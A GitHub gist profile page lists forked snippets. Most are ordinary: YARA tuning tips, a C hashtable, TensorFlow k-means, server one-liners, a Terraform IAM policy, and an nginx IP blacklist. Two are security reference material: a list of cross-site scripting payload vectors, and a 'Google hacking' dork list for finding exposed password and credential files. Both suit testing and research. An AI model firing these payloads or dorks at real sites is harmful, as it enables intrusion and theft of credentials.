Skip to content

Instantly share code, notes, and snippets.

View mylamour's full-sized avatar
✌️
Do the right thing

Mour mylamour

✌️
Do the right thing
186 followers · 16 following
View GitHub Profile
@mylamour
mylamour / html2secvector.list
Last active July 10, 2019 03:18 — forked from tennc/dict.list
>>> vectors()
<div id="1"><form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>//["'`-->]]>]</div><div id="2"><meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi//["'`-->]]>]</div><div id="3"><meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>//["'`-->]]>]</div><div id="4">0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))//["'`-->]]>]</div><div id="5"><script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(5)',384,null,'rsa-dual-use')</script>//["'`-->]]>]</div><div id="6"><script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>//["'`-->]]>]</div><div id="7"><input onfocus=alert(7) autofocus>//["'`-->]]>]</div><div id="8"><input onblur=alert(8) autofocus><input autofocus>//["'`-->]]>]</div><div id="9"><a style="-o-link:'javascript:alert(9)';-o-link-source
@mylamour
mylamour / yara_performance_guidelines.md
Created December 5, 2017 06:05 — forked from Neo23x0/yara_performance_guidelines.md
YARA Performance Guidelines

YARA Performance Guidelines

When creating your rules for YARA keep in mind the following guidelines in order to get the best performance from them. This guide is based on ideas and recommendations by Victor M. Alvarez and WXS.

  • Revision 1.1, February 2016, applies to all YARA version 3.3+

Global Rules

Global rules are evaluated first. Only if they are satisfied non-global rules are evaluated. This may be useful if all samples exhibit the same characteristics. Use them combined with the "private" statement to suppress a match notification on the global rules.

@mylamour
mylamour / hash.c
Created December 19, 2017 07:30 — forked from tonious/hash.c
A quick hashtable implementation in c.
/* Read this comment first: https://gist.github.com/tonious/1377667#gistcomment-2277101
* 2017-12-05
*
* -- T.
*/
#define _XOPEN_SOURCE 500 /* Enable certain library functions (strdup) on linux. See feature_test_macros(7) */
#include <stdlib.h>
#include <stdio.h>
@mylamour
mylamour / GoogleHackMasterList.txt
Created February 2, 2018 05:26 — forked from cmartinbaughman/GoogleHackMasterList.txt
The definitive super list for "Google Hacking".
admin account info" filetype:log
!Host=*.* intext:enc_UserPassword=* ext:pcf
"# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd
"AutoCreate=TRUE password=*"
"http://*:*@www&#8221; domainname
"index of/" "ws_ftp.ini" "parent directory"
"liveice configuration file" ext:cfg -site:sourceforge.net
"parent directory" +proftpdpasswd
Duclassified" -site:duware.com "DUware All Rights reserved"
duclassmate" -site:duware.com
@mylamour
mylamour / kmeans.py
Created April 4, 2018 06:43 — forked from dave-andersen/kmeans.py
k-means in Tensorflow
import tensorflow as tf
import numpy as np
import time
N=10000
K=4
MAX_ITERS = 1000
start = time.time()
@mylamour
mylamour / web-servers.md
Created May 30, 2018 02:52 — forked from willurd/web-servers.md
Big list of http static server one-liners

Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.

Discussion on reddit.

Python 2.x

$ python -m SimpleHTTPServer 8000
@mylamour
mylamour / curl-websocket.sh
Created May 31, 2018 03:58 — forked from htp/curl-websocket.sh
Test a WebSocket using curl.
curl --include \
--no-buffer \
--header "Connection: Upgrade" \
--header "Upgrade: websocket" \
--header "Host: example.com:80" \
--header "Origin: http://example.com:80" \
--header "Sec-WebSocket-Key: SGVsbG8sIHdvcmxkIQ==" \
--header "Sec-WebSocket-Version: 13" \
http://example.com:80/
@mylamour
mylamour / assume-role-policy.json
Created June 6, 2018 08:57 — forked from clstokes/assume-role-policy.json
Example: Terraform IAM Role
{
"Version": "2012-10-17",
"Statement": [
{
"Action": "sts:AssumeRole",
"Principal": {
"Service": "ec2.amazonaws.com"
},
"Effect": "Allow",
"Sid": ""
@mylamour
mylamour / gist:0d715c602e62133e3fd9de214cb31e74
Created July 7, 2018 01:51 — forked from wikimatze/gist:9790374
Github Two-Factor Authentication Failed For HTTPS

I heard from GitHub Two-Factor Authentication](https://github.com/blog/1614-two-factor-authentication) nearly a couple of days ago when I was reading my RSS feed. I enabled it and couldn' push to any of my repositories anymore. Learn in this blog post how to fix it.

Two-Factor Authentication

"Is a process involving two stages to verify the identity of an entity trying to access services in a computer or in a network". Github solves this authentication with sending an SMS to a device which wants to push to their platform.

Enabling Two-Factor Authentication

@mylamour
mylamour / ip_blacklist.lua
Created July 9, 2018 05:13 — forked from Ceelog/cloudSettings
-- a quick LUA access script for nginx to check IP addresses against an
-- `ip_blacklist` set in Redis, and if a match is found send a HTTP 403.
--
-- allows for a common blacklist to be shared between a bunch of nginx
-- web servers using a remote redis instance. lookups are cached for a
-- configurable period of time.
--
-- block an ip:
-- redis-cli SADD ip_blacklist 10.1.1.1
-- remove an ip: